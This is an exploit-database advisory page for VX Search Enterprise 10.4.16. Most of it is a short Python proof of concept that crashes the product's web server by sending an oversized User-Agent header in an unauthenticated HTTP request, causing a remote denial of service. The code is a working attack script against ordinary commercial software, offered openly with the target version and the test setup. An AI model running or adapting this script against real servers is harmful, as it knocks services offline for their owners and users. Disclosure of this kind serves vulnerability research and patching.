VX Search Enterprise 10.4.16 User-Agent Denial of Service

2019.08.30
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: VX Search Enterprise v10.4.16 DoS # Google Dork: N/A # Date: 17.01.2018 # Exploit Author: James Chamberlain [chumb0] # Vendor Homepage: http://www.vxsearch.com/downloads.html # Software Link: http://www.vxsearch.com/setups/vxsearchent_setup_v10.4.16.exe # Version: v10.4.16 # Tested on: Windows 7 Home x86 # CVE : N/A # Have been unable to overwrite SEH/EIP, but the crash serves as an unauthenticated DoS. # Replication - Large buffer sent in the majority of Request Headers. PoC attached. Server needs http enabling (non default) #!/usr/bin/python import socket pwnd = "A" * 5000 s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(('192.168.50.133', 80)) buf = "" buf += "GET / HTTP/1.1" + "\r\n" buf += "Host: 192.168.50.133\r\n" buf += "User-Agent: " + pwnd + "r\n" buf += "\r\n\r\n" s.send(buf) s.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top